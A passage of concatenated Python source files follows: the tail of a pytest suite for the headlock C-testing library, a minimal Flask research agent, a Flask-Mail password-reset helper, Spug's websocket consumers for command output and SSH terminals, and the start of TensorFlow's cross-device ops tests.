assert dummy.attr.__addrspace__ == dummy.__addrspace__
def test_set_onInstance_raisesAttributeError(self, Dummy):
with pytest.raises(AttributeError):
Dummy().attr = 99
class TestCProxyDescriptor:
@pytest.fixture
def Dummy(self):
class Dummy:
attr = CProxyDescriptor("attr", cdm.BuildInDefs.int)
return Dummy
def test_get_onClass_returnsCProxyType(self, Dummy):
assert Dummy.attr is cdm.BuildInDefs.int
def test_get_onInstance_returnsCProxyWithAddrspace(self, Dummy):
dummy = Dummy()
dummy.__addrspace__ = Mock()
assert isinstance(dummy.attr, cdm.CInt)
assert dummy.attr.ctype.__addrspace__ == dummy.__addrspace__
def test_set_onInstance_raisesAttributeError(self, Dummy):
with pytest.raises(AttributeError):
Dummy().attr = 99
class TestTestSetup(object):
"""
This is an integration test, that tests the testsetup class and the
collaboration of the headlock components
"""
def abs_dir(self):
return (Path(__file__).parent / 'c_files').resolve()
def extend_builddesc(self, builddesc:GccBuildDescription,
source_code, filename):
abs_filename = self.abs_dir() / filename
abs_filename.write_bytes(source_code)
builddesc.add_c_source(abs_filename)
def create_builddesc(self, source_code, filename, *, unique_name=True,
**macros):
builddesc = default.BUILDDESC_CLS(
Path(filename).name,
self.abs_dir() / (filename + '.build'),
unique_name)
builddesc.add_predef_macros(macros)
self.extend_builddesc(builddesc, source_code, filename)
return builddesc
def cls_from_ccode(self, src, filename,
src_2=None, filename_2=None, **macros):
builddesc = self.create_builddesc(src, filename, **macros)
if src_2 is not None:
self.extend_builddesc(builddesc, src_2, filename_2)
class TSDummy(TestSetup): pass
TSDummy.__set_builddesc__(builddesc)
return TSDummy
@pytest.fixture
def ts_dummy(self):
return self.cls_from_ccode(b'', 'test.c')
class TSBuildDescFactory(TestSetup): pass
def test_builddescFactory_returnsBuildDescWithGlobalBuildDirAndName(self):
builddesc = self.TSBuildDescFactory.__builddesc_factory__()
assert builddesc.name == 'TSBuildDescFactory.TestTestSetup'
assert builddesc.build_dir \
== Path(__file__).parent.resolve() / \
'.headlock/test_testsetup' / builddesc.name
def test_builddescFactory_onLocalTestSetupDefinition_returnsBuildDescWithHashInBuilDir(self):
class TSBuildDescFactory(TestSetup): pass
builddesc = TSBuildDescFactory.__builddesc_factory__()
int(builddesc.build_dir.name[-8:], 16) # expect hexnumber at the end
assert builddesc.build_dir.name[-9] == '_'
def test_builddescFactory_onDynamicGeneratedTSClsWithSameParams_returnsBuildDescWithSameBuildDir(self):
builddesc1 = self.create_builddesc(b'', 'test.c', unique_name=False,
MACRO=1)
builddesc2 = self.create_builddesc(b'', 'test.c', unique_name=False,
MACRO=1)
assert builddesc1.build_dir == builddesc2.build_dir
def test_builddescFactory_onDynamicGeneratedTSClsWithDifferentParams_returnsBuildDescWithDifferentBuildDir(self):
builddesc1 = self.create_builddesc(b'', 'test.c', unique_name=False,
A=1, B=222, C=3)
builddesc2 = self.create_builddesc(b'', 'test.c', unique_name=False,
A=1, B=2, C=3)
assert builddesc1.build_dir != builddesc2.build_dir
def test_macroWrapper_ok(self):
TS = self.cls_from_ccode(b'#define MACRONAME 123', 'macro.c')
assert TS.MACRONAME == 123
def test_macroWrapper_onNotConvertableMacros_raisesValueError(self):
cls = self.cls_from_ccode(b'#define MACRONAME (int[]) 3',
'invalid_macro.c')
ts = cls()
with pytest.raises(ValueError):
_ = ts.MACRONAME
def test_create_onPredefinedMacro_providesMacroAsMember(self):
TSMock = self.cls_from_ccode(b'', 'create_predef.c',
A=None, B=1, C='')
with TSMock() as ts:
assert ts.A is None
assert ts.B == 1
assert ts.C is None
def test_init_onValidSource_ok(self):
TS = self.cls_from_ccode(b'/* valid C source code */', 'comment_only.c')
ts = TS()
ts.__unload__()
@patch('headlock.testsetup.TestSetup.__unload__')
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__build__')
def test_init_callsBuild(self, __build__, __load__, __unload__):
TS = self.cls_from_ccode(b'', 'init_does_build.c')
ts = TS()
__build__.assert_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__')
def test_init_callsLoad(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'init_calls_load.c')
ts = TS()
__load__.assert_called_once()
@patch('headlock.testsetup.TestSetup.__startup__')
def test_init_doesNotCallStartup(self, __startup__):
TS = self.cls_from_ccode(b'', 'init_on_nostartup.c')
ts = TS()
__startup__.assert_not_called()
ts.__unload__()
def test_build_onMultipleFilesWithReferences_ok(self):
TSMock = self.cls_from_ccode(
b'void callee(void) { return; }', 'prev.c',
b'void callee(void); void caller(void) { callee(); }', 'refprev.c')
TSMock()
def test_build_onPredefinedMacros_passesMacrosToCompiler(self):
TSMock = self.cls_from_ccode(b'int a = A;\n'
b'int b = B 22;\n'
b'#if defined(C)\n'
b'int c = 33;\n'
b'#endif',
'build_predef.c',
A=11, B='', C=None)
with TSMock() as ts:
assert ts.a.val == 11
assert ts.b.val == 22
assert ts.c.val == 33
@patch('headlock.testsetup.TestSetup.__shutdown__')
def test_unload_onStarted_callsShutdown(self, __shutdown__):
TS = self.cls_from_ccode(b'int var;', 'unload_calls_shutdown.c')
ts = TS()
ts.__startup__()
ts.__unload__()
__shutdown__.assert_called_once()
@patch('headlock.testsetup.TestSetup.__shutdown__')
def test_unload_onNotStarted_doesNotCallsShutdown(self, __shutdown__):
TS = self.cls_from_ccode(b'int var;', 'unload_calls_shutdown.c')
ts = TS()
ts.__unload__()
__shutdown__.assert_not_called()
def test_unload_calledTwice_ignoresSecondCall(self):
TS = self.cls_from_ccode(b'', 'unload_run_twice.c')
ts = TS()
ts.__unload__()
ts.__shutdown__ = Mock()
ts.__unload__()
ts.__shutdown__.assert_not_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__')
def test_del_doesImplicitShutdown(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'unload_run_twice.c')
ts = TS()
__unload__.assert_not_called()
del ts
__unload__.assert_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__', side_effect=KeyError)
def test_del_onErrorDuringUnload_ignore(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'unload_with_error_during_del.c')
ts = TS()
del ts
def test_enter_onNotStarted_callsStartup(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_on_enter.c')
ts = TSMock()
with patch.object(ts, '__startup__') as startup:
ts.__enter__()
startup.assert_called_once()
ts.__unload__()
def test_enter_onAlreadyStarted_doesNotCallStartup(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_enter_on_started.c')
ts = TSMock()
ts.__startup__()
with patch.object(ts, '__startup__') as startup:
ts.__enter__()
startup.assert_not_called()
ts.__unload__()
def test_exit_callsUnload(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_on_exit.c')
ts = TSMock()
ts.__enter__()
with patch.object(ts, '__unload__', wraps=ts.__unload__):
ts.__exit__(None, None, None)
ts.__unload__.assert_called_once()
def test_funcWrapper_onNotInstantiatedTestSetup_returnsCProxyType(self):
TSMock = self.cls_from_ccode(b'int func(int a, int b) { return a+b; }',
'func_not_inst.c')
assert isinstance(TSMock.func, cdm.CFuncType)
assert isinstance(TSMock.func.returns, cdm.CIntType)
def test_funcWrapper_ok(self):
TSMock = self.cls_from_ccode(
b'short func(char a, int *b) { return a + *b; }', 'func.c')
with TSMock() as ts:
assert ts.func(11, ts.int(22).adr) == 33
def test_funcWrapper_onMultipleUniqueSignatures_ok(self):
TSMock = self.cls_from_ccode(
b'int func1(int a) { return 11; }'
b'int func2(int a, int b) { return 22; }'
b'int func3(int a, int b, int c) { return 33; }'
b'int func4(int a, int b, int c, int d) { return 44; }',
'func_multi_unique_sig.c')
with TSMock() as ts:
assert ts.func1(0) == 11
assert ts.func2(0, 0) == 22
assert ts.func3(0, 0, 0) == 33
assert ts.func4(0, 0, 0, 0) == 44
def test_funcWrapper_onMultipleIdenticalSignatures_ok(self):
TSMock = self.cls_from_ccode(
b'int func1(int a) { return 11; }'
b'int func2(int a) { return 22; }',
'func_multi_identical_sig.c')
with TSMock() as ts:
assert ts.func1(0) == 11
assert ts.func2(0) == 22
def test_funcWrapper_onStructAsParamAndReturnsValue_ok(self):
TSMock = self.cls_from_ccode(
b'struct param { int m1, m2; };\n'
b'struct result { int m1, m2; };\n'
b'struct result func(struct param p) {\n'
b' struct result r = {p.m1+1, p.m2+1};\n'
b' return r;\n'
b'}',
'func_with_struct.c')
with TSMock() as ts:
param = ts.struct.param(100, 200)
assert ts.func(param) == dict(m1=101, m2=201)
def test_funcPtrWrapper_ok(self):
TSMock = self.cls_from_ccode(b'typedef int (* func_ptr_t)(int);\n'
b'func_ptr_t func_ptr;\n'
b'int call_func_ptr(int param) {\n'
b' return (*func_ptr)(param);\n'
b'}',
'funcptr.c')
with TSMock() as ts:
pyfunc = Mock(return_value=111)
ts.func_ptr.val = ts.func_ptr_t(pyfunc)
ts.call_func_ptr(2222)
pyfunc.assert_called_once_with(2222)
def test_funcPtrWrapper_requiringStruct_ok(self):
TSMock = self.cls_from_ccode(b'typedef struct { int m1, m2; } strct;\n'
b'typedef int (* func_ptr_t)(strct);\n'
b'func_ptr_t func_ptr;',
'funcptr_with_struct.c')
with TSMock() as ts:
def pyfunc(strct):
assert strct.m1 == 1111
assert strct.m2 == 2222
ts.func_ptr.val = ts.func_ptr_t(pyfunc)
ts.func_ptr(ts.strct(1111, 2222))
def test_varWrapper_onNotInstantiatedTestSetup_returnsCProxyType(self):
TSMock = self.cls_from_ccode(b'short var = 1;',
'var_not_inst.c')
assert isinstance(TSMock.var, cdm.CIntType)
assert TSMock.var.sizeof == 2
def test_varWrapper_ok(self):
TSMock = self.cls_from_ccode(b'int var = 11;', 'var.c')
with TSMock() as ts:
assert ts.var.val == 11
ts.var.val = 22
assert ts.var.val == 22
def test_mockVarWrapper_ok(self):
TSMock = self.cls_from_ccode(b'extern int var;', 'mocked_var.c')
with TSMock() as ts:
assert ts.var.val == 0
ts.var.val = 11
assert ts.var.val == 11
def test_mockFuncWrapper_createsCWrapperCode(self):
TSMock = self.cls_from_ccode(
b'int mocked_func(int p);'
b'int func(int p) { return mocked_func(p) + 33; }',
'mocked_func_cwrapper.c')
with TSMock() as ts:
ts.mocked_func_mock = Mock(return_value=22)
assert ts.func(11) == 22 + 33
ts.mocked_func_mock.assert_called_once_with(11)
def test_mockFuncWrapper_onOverwriteStack_keepsCProxyVal(self):
TSMock = self.cls_from_ccode(
b'void f(int val);\n'
b'void call_3_times(void) { f(1111); f(2222); f(3333); return; }',
'multicalled_mock.c')
with TSMock() as ts:
call_params = []
ts.f_mock = lambda param: call_params.append(param)
ts.call_3_times()
assert call_params == [1111, 2222, 3333]
def test_headerFileOnly_createsMockOnly(self):
TSMock = self.cls_from_ccode(b'int func();', 'header.h')
with TSMock() as ts:
ts.func_mock = Mock(return_value=123)
assert ts.func().val == 123
def test_mockFuncWrapper_onNotExistingMockFunc_forwardsToMockFallbackFunc(self):
TSMock = self.cls_from_ccode(b'int func(int * a, int * b);',
'mocked_func_fallback.c')
with TSMock() as ts:
ts.mock_fallback = Mock(return_value=33)
assert ts.func(11, 22) == 33
ts.mock_fallback.assert_called_with('func', ts.int.ptr(11),
ts.int.ptr(22))
def test_mockFuncWrapper_onUnmockedFunc_raisesMethodNotMockedError(self):
TSMock = self.cls_from_ccode(b'void unmocked_func();',
'mocked_func_error.c')
with TSMock() as ts:
with pytest.raises(MethodNotMockedError) as excinfo:
assert ts.mock_fallback('unmocked_func', 11, 22)
assert "unmocked_func" in str(excinfo.value)
def test_mockFuncWrapper_onRaisesException_forwardsExcImmediatelyToCallingPyCode(self):
TSMock = self.cls_from_ccode(b'void exc_func();\n'
b'void func() { exc_func(); exc_func(); }',
'exc_forwarder.c')
with TSMock() as ts:
ts.exc_func_mock = Mock(side_effect=ValueError)
with pytest.raises(ValueError):
ts.func()
assert ts.exc_func_mock.call_count == 1
def test_mockFuncWrapper_onRaisesException_forwardsExcOverMultipleBridges(self):
TSMock = self.cls_from_ccode(b'void inner_py();\n'
b'void outer_py();\n'
b'void inner_c() { while(1) inner_py();}\n'
b'void outer_c() { while(1) outer_py();}',
'multibridged_exc_forwarder.c')
with TSMock() as ts:
ts.outer_py_mock = lambda: ts.inner_c()
ts.inner_py_mock = Mock(side_effect=KeyError)
with pytest.raises(KeyError):
ts.outer_c()
def test_mockFuncWrapper_onRaisesExceptionsInMultipleThreads_handlesEveryThreadSeparately(self):
TSMock = self.cls_from_ccode(b'void exc_func(int tid);\n'
b'void func(int tid) {exc_func(tid);}',
'multithreaded_exc_forwarder.c')
with TSMock() as ts:
def exc_func(tid):
sleep(0.030)
raise ValueError(str(tid))
ts.exc_func_mock = exc_func
def thread_func(tid):
with pytest.raises(ValueError, match=str(tid)):
ts.func(tid)
threads = [Thread(target=thread_func, args=[tid])
for tid in range(5)]
for thread in threads:
thread.start()
sleep(0.005)
for thread in threads:
thread.join()
def test_typedefWrapper_storesTypeDefInTypedefCls(self):
TSMock = self.cls_from_ccode(b'typedef int td_t;', 'typedef.c')
with TSMock() as ts:
assert ts.td_t == ts.int
def test_typedefWrapper_instanciate_ok(self):
TSMock = self.cls_from_ccode(b'typedef int i;', 'instantiate_typedef.c')
with TSMock() as ts:
assert ts.i(33) == 33
def test_structWrapper_storesStructDefInStructCls(self):
TSMock = self.cls_from_ccode(b'struct strct_t { };', 'struct.c')
with TSMock() as ts:
assert isinstance(ts.struct.strct_t, cdm.CStructType)
def test_structWrapper_onContainedStruct_ensuresContainedStructDeclaredFirst(self):
TSMock = self.cls_from_ccode(
b'struct s2_t { '
b' struct s1_t { int m; } s1; '
b' struct s3_t { int m; } s3;'
b'} ;'
b'void f(struct s2_t);',
'inorder_defined_structs.c')
with TSMock(): pass
def test_structWrapper_onContainedStructPtr_ensuresNonPtrMembersDeclaredFirst(self):
TSMock = self.cls_from_ccode(
b'struct outer_t;'
b'struct inner_t { '
b' struct outer_t * outer_ptr;'
b'} inner_t; '
b'struct outer_t { '
b' struct inner_t inner;'
b'} outer;'
b'void f(struct inner_t);',
'inorder_ptr_structs.c')
with TSMock(): pass
def test_structWrapper_onGlobalVarFromStruct_ok(self):
TSMock = self.cls_from_ccode(b'struct strct { int a; };\n'
b'struct strct var;',
'global_var_from_structs.c')
with TSMock() as ts:
assert ts.var.ctype == ts.struct.strct
def test_structWrapper_onVarFromAnonymousStruct_ok(self):
TSMock = self.cls_from_ccode(b'struct { int a; } var;',
'anonymous_structs_var.c')
with TSMock() as ts:
assert isinstance(ts.var.ctype, cdm.CStructType)
def test_structWrapper_onTypedefFromAnonymousStruct_renamesStructToMakeItUsableAsParameter(self):
TSMock = self.cls_from_ccode(b'typedef struct { int a; } t;\n'
b'void func(t * a);',
'anonymous_structs_typedef.c')
with TSMock() as ts:
anon_cstruct_type = getattr(ts.struct, '__anonymousfromtypedef__t')
assert not anon_cstruct_type.is_anonymous_struct()
def test_structWrapper_onInstanciate_bindsAddrSpace(self):
TSMock = self.cls_from_ccode(b'struct s_t { int a; };',
'instanciated_struct.c')
with TSMock() as ts:
assert ts.struct.s_t(44) == dict(a=44)
def test_structWrapper_onInstanciateWithPointerMember_instantiatesMemberToo(self):
TSMock = self.cls_from_ccode(b'struct s_t { char * ptr; };',
'instanciated_struct_with_ptr.c')
with TSMock() as ts:
s = ts.struct.s_t(b'TEST')
assert s.ptr.ref.mem == b'TEST'
def test_enumWrapper_storesEnumDefInEnumCls(self):
TSMock = self.cls_from_ccode(b'enum enum_t { a };', 'enum.c')
with TSMock() as ts:
assert isinstance(ts.enum.enum_t, cdm.CEnumType)
def test_onSameStructWithAnonymousChildInDifferentModules_generateCorrectMockWrapper(self):
TSDummy = self.cls_from_ccode(
b'struct s { struct { int mm; } m; };\n'
b'int func1(struct s p);\n', 'anonymstruct_mod1.c',
b'struct s { struct { int mm; } m; };\n'
b'int func2(struct s p);\n', 'anonymstruct_mod2.c')
with TSDummy() as ts:
pass
def test_onPointerToArrayOfStruct_generatesCorrectMockWrapper(self):
TSDummy = self.cls_from_ccode(b'typedef struct strct {} (*type)[1];\n'
b'void func(type param);',
'ptr_to_arr_of_strct.c')
with TSDummy() as ts:
pass
def test_onConstStruct_ok(self):
TSDummy = self.cls_from_ccode(b'const struct s {} x;',
'const_strct.c')
with TSDummy() as ts:
pass
def test_onTwoTestsetups_haveDifferentStructCollections(self):
TS1 = self.cls_from_ccode(b'struct s { int a; };', 'struct1.c')
TS2 = self.cls_from_ccode(b'struct s { int b; };', 'struct2.c')
assert hasattr(TS1.struct.s, 'a')
assert hasattr(TS2.struct.s, 'b')
def test_registerUnloadEvent_onRegisteredEvent_isCalledOnUnload(self):
TSDummy = self.cls_from_ccode(b'', 'test_register_unload_ev.c')
ts = TSDummy()
on_unload = Mock()
ts.register_unload_event(on_unload)
ts.__shutdown__()
on_unload.assert_not_called()
ts.__unload__()
on_unload.assert_called_once()
def test_registerUnloadEvent_onParams_arePassedWhenUnloaded(self):
TSDummy = self.cls_from_ccode(b'', 'test2.c')
with TSDummy() as ts:
on_unload = Mock()
ts.register_unload_event(on_unload, "PARAM1", 2)
on_unload.assert_called_with('PARAM1', 2)
def test_registerUnloadEvent_onMultipleEvents_areCalledInReversedOrder(self):
TSDummy = self.cls_from_ccode(b'', 'test3.c')
with TSDummy() as ts:
on_unload = Mock()
ts.register_unload_event(on_unload, 1)
ts.register_unload_event(on_unload, 2)
ts.register_unload_event(on_unload, 3)
assert on_unload.call_args_list == [call(3), call(2), call(1)]
@pytest.mark.skipif(sys.platform != 'win32',
reason='Currently there is not Linux '
'equivalent to __cdecl')
def test_attributeAnnotationSupport_onStdIntIncluded_ok(self):
TSDummy = self.cls_from_ccode(b'#include <stdint.h>\n'
b'int __cdecl cdecl_func(void);',
'attr_annotation_support.c')
with TSDummy() as ts:
assert '__cdecl' in ts.cdecl_func.ctype.__c_attribs__
class TestCModule:
class TestSetupMock:
__builddesc__ = None
@classmethod
def __builddesc_factory__(cls):
return Gcc32BuildDescription('', Path(''))
@classmethod
def __set_builddesc__(cls, builddesc):
cls.__builddesc__ = builddesc
@patch.object(Path, 'is_file', return_value=True)
def test_call_onSrcPath_derivesBuilddescFactoryToAddAbsSrcPath(self, is_file):
@CModule('rel_src.c')
class TSRelSrc(self.TestSetupMock): pass
abs_c_src = Path(__file__).resolve().parent / 'rel_src.c'
assert TSRelSrc.__builddesc__.c_sources() == [abs_c_src]
is_file.assert_called_with(abs_c_src)
@patch.object(Path, 'is_file', return_value=False)
def test_call_onInvalidSrcPath_raisesOSError(self, is_file):
with pytest.raises(OSError):
@CModule('rel_src.c')
class TSInvalidSrc(self.TestSetupMock): pass
@patch.object(Path, 'is_file', return_value=True)
def test_call_onPredefMacros_derivsBuilddescFactoryToAddPredefMacros(self, is_file):
@CModule('src.c', MACRO1=1, MACRO2='')
class TSPredefMacros(self.TestSetupMock): pass
abs_c_src = Path(__file__).resolve().parent / 'src.c'
assert TSPredefMacros.__builddesc__.predef_macros() \
== {abs_c_src: dict(MACRO1='1', MACRO2='')}
@patch.object(Path, 'is_file', return_value=True)
@patch.object(Path, 'is_dir', return_value=True)
def test_call_onInclOrLibDir_derivesBuilddescFactoryToSetAbsDirPath(self, is_dir, is_file):
@CModule('src.c', include_dirs=['rel/dir'])
class TSRelDir(self.TestSetupMock): pass
abs_src = Path(__file__).resolve().parent / 'src.c'
abs_path = Path(__file__).resolve().parent / 'rel/dir'
assert TSRelDir.__builddesc__.incl_dirs() == {abs_src: [abs_path]}
is_dir.assert_called_with(abs_path)
@patch.object(Path, 'is_file', return_value=True)
@patch.object(Path, 'is_dir', return_value=False)
@pytest.mark.parametrize('dir_name', ['library_dirs', 'include_dirs'])
def test_call_onInvalidInclOrLibDir_raisesOSError(self, is_dir, is_file, dir_name):
with pytest.raises(OSError):
@CModule('src.c', **{dir_name: 'invalid/dir'})
class TSInvalidDir(self.TestSetupMock): pass
@patch.object(Path, 'is_file', return_value=True)
def test_call_onDerivedClass_doesNotModifyBaseClassesBuildDesc(self, is_file):
@CModule('src_base.c')
class TSBase(self.TestSetupMock): pass
@CModule('src_derived.c')
class TSDerived(TSBase): pass
assert {p.name for p in TSBase.__builddesc__.c_sources()} \
== {'src_base.c'}
assert {p.name for p in TSDerived.__builddesc__.c_sources()} \
== {'src_base.c', 'src_derived.c'}
|
tr_ara_simple.py
|
from flask import Flask, request, url_for, jsonify, abort
import requests, sys, threading, time
ARS_API = 'http://localhost:8000/ars/api'
def setup_app():
DEFAULT_ACTOR = {
'channel': 'general',
'agent': {
'name': 'ara-simple-agent',
'uri': 'http://localhost:5000'
},
'path': '/simple' # relative to agent's uri
}
# wait for flask to finish intializing before it can accept
# connections from the ars
time.sleep(2)
r = requests.post(ARS_API+'/actors', json=DEFAULT_ACTOR)
if r.status_code != 201 and r.status_code != 302:
app.logger.error('Unable to intialize actor; %s return status %d'
% (r.url, r.status_code))
sys.exit(1)
print('initializing %s...%d\n%s' % (__name__, r.status_code, r.text))
app = Flask(__name__)
threading.Thread(target=setup_app).start()
@app.route('/', methods=['GET'])
def index():
return 'A simple ARA that does nothing!'
@app.route('/simple', methods=['POST'])
def simple():
data = request.get_json()
if 'model' not in data or data['model'] != 'tr_ars.message':
return abort(400)
app.logger.debug('%s: received message...%s' % (request.url, data['pk']))
mesg = data['fields']
if 'ref' not in mesg or mesg['ref'] != None:
# this is not a head message, so we're not interested
return abort(400)
return (jsonify(message="This is an acknowledgement that I have nothing to contribute to this query!"),
200, # return status code
{'tr_ars.message.status': 'D'}) # set the status of the message
if __name__ == '__main__':
app.run()
|
email.py
|
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
mail.send(msg)
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
consumers.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the AGPL-3.0 License.
from channels.generic.websocket import WebsocketConsumer
from django_redis import get_redis_connection
from apps.host.models import Host
from threading import Thread
import json
class ExecConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token = self.scope['url_route']['kwargs']['token']
self.rds = get_redis_connection()
def connect(self):
self.accept()
def disconnect(self, code):
self.rds.close()
def get_response(self):
response = self.rds.brpop(self.token, timeout=5)
return response[1] if response else None
def receive(self, **kwargs):
response = self.get_response()
while response:
data = response.decode()
self.send(text_data=data)
response = self.get_response()
self.send(text_data='pong')
class SSHConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = self.scope['user']
self.id = self.scope['url_route']['kwargs']['id']
self.chan = None
self.ssh = None
def loop_read(self):
while True:
data = self.chan.recv(32 * 1024)
# print('read: {!r}'.format(data))
if not data:
self.close(3333)
break
self.send(bytes_data=data)
def receive(self, text_data=None, bytes_data=None):
data = text_data or bytes_data
if data:
data = json.loads(data)
# print('write: {!r}'.format(data))
resize = data.get('resize')
if resize and len(resize) == 2:
self.chan.resize_pty(*resize)
else:
self.chan.send(data['data'])
def disconnect(self, code):
self.chan.close()
self.ssh.close()
# print('Connection close')
def connect(self):
if self.user.has_host_perm(self.id):
self.accept()
self._init()
else:
self.close()
def _init(self):
self.send(bytes_data=b'Connecting ...\r\n')
host = Host.objects.filter(pk=self.id).first()
if not host:
self.send(text_data='Unknown host\r\n')
self.close()
try:
self.ssh = host.get_ssh().get_client()
except Exception as e:
self.send(bytes_data=f'Exception: {e}\r\n'.encode())
self.close()
return
self.chan = self.ssh.invoke_shell(term='xterm')
self.chan.transport.set_keepalive(30)
Thread(target=self.loop_read).start()
|
cross_device_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps in v1 graph mode."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import os
import threading
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import cluster_resolver
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import kernels
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
def _get_devices(devices):
if isinstance(devices, (tuple, list)):
return tuple(device_util.resolve(d) for d in devices)
elif isinstance(devices, value_lib.DistributedValues):
return devices._devices
elif isinstance(devices, ops.Tensor):
return (device_util.resolve(devices.device),)
return (device_util.resolve(devices),)
def _make_per_replica(values, devices, regroup=False):
devices = _get_devices(devices)
assert len(values) == len(devices)
# We simulate the result of regroup called on PerReplica which strips the
# PerReplica wrapper if it has only one value.
if len(values) == 1 and regroup:
with ops.device(devices[0]):
placed_v = array_ops.identity(values[0])
return placed_v
index = []
for d, v in zip(devices, values):
with ops.device(d):
placed_v = array_ops.identity(v)
index.append(placed_v)
return distribute_utils.regroup(index)
# pylint: disable=g-doc-args,g-doc-return-or-yield
def _fake_mirrored(value, devices):
"""Create a faked Mirrored object for testing.
All components of the returned Mirrored have the same objects, which is not
true in reality.
"""
devices = _get_devices(devices)
values = []
for d in devices:
with ops.device(d):
values.append(array_ops.identity(value))
return distribute_utils.regroup(
values,
wrap_class=value_lib.Mirrored)
def _make_indexed_slices(values, indices, dense_shape, device):
with ops.device(device):
tensor = ops.IndexedSlices(
values=constant_op.constant(values),
indices=constant_op.constant(indices),
dense_shape=constant_op.constant(dense_shape))
return tensor
def _make_mirrored_indexed_slices(devices, values, indices, dense_shape):
values = [_make_indexed_slices(values, indices, dense_shape, d)
for d in devices]
return distribute_utils.regroup(
values,
wrap_class=value_lib.Mirrored)
_cpu_device = "/device:CPU:0"
class CrossDeviceOpsTestBase(test.TestCase, parameterized.TestCase):
def _assert_indexed_slices_equal(self, left, right):
self.assertIsInstance(left, ops.IndexedSlices)
self.assertIsInstance(right, ops.IndexedSlices)
self.assertEqual(
device_util.resolve(left.device), device_util.resolve(right.device))
self.assertAllEqual(
self.evaluate(ops.convert_to_tensor(left)),
self.evaluate(ops.convert_to_tensor(right)))
def _assert_mirrored_equal(self,
left_list,
right_list,
sess=None,
run_options=None):
if not isinstance(left_list, list):
left_list, right_list = [left_list], [right_list]
for left, right in zip(left_list, right_list):
self.assertEqual(type(left), type(right))
# Convert Mirrored to a list since sess.run(Mirrored) only returns one
# value.
if isinstance(left, value_lib.Mirrored):
left, right = left.values, right.values
else:
# When there's only one replica Mirrored is automatically unwrapped.
left, right = [left], [right]
for left_value, right_value in zip(left, right):
self.assertEqual(
device_util.resolve(left_value.device),
device_util.resolve(right_value.device))
# Densify IndexedSlices.
left = [ops.convert_to_tensor(v) for v in left]
right = [ops.convert_to_tensor(v) for v in right]
if not context.executing_eagerly():
left, right = sess.run((left, right), options=run_options)
for left_value, right_value in zip(left, right):
self.assertAllEqual(left_value, right_value)
def _testReductionAndBroadcast(self, cross_device_ops, devices):
if context.num_gpus() < sum(1 for d in devices if "GPU" in d.upper()):
self.skipTest("Not enough GPUs")
with self.cached_session() as sess:
values = [constant_op.constant(float(d)) for d in range(len(devices))]
per_replica = _make_per_replica(values, devices)
mean = (len(devices) - 1.) / 2.
values_2 = [constant_op.constant(d + 1.0) for d in range(len(devices))]
per_replica_2 = _make_per_replica(values_2, devices)
mean_2 = mean + 1.
destination_mirrored = _fake_mirrored(1., devices)
destination_different = _fake_mirrored(1.,
device_util.resolve(_cpu_device))
destination_str = device_util.resolve(_cpu_device)
all_destinations = [
destination_mirrored,
destination_different,
destination_str,
]
# test reduce()
for destinations in all_destinations:
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.MEAN,
per_replica,
destinations=destinations), _fake_mirrored(mean, destinations),
sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.MEAN,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2, destinations), sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.SUM,
per_replica,
destinations=destinations),
_fake_mirrored(mean * len(devices), destinations), sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.SUM,
per_replica_2,
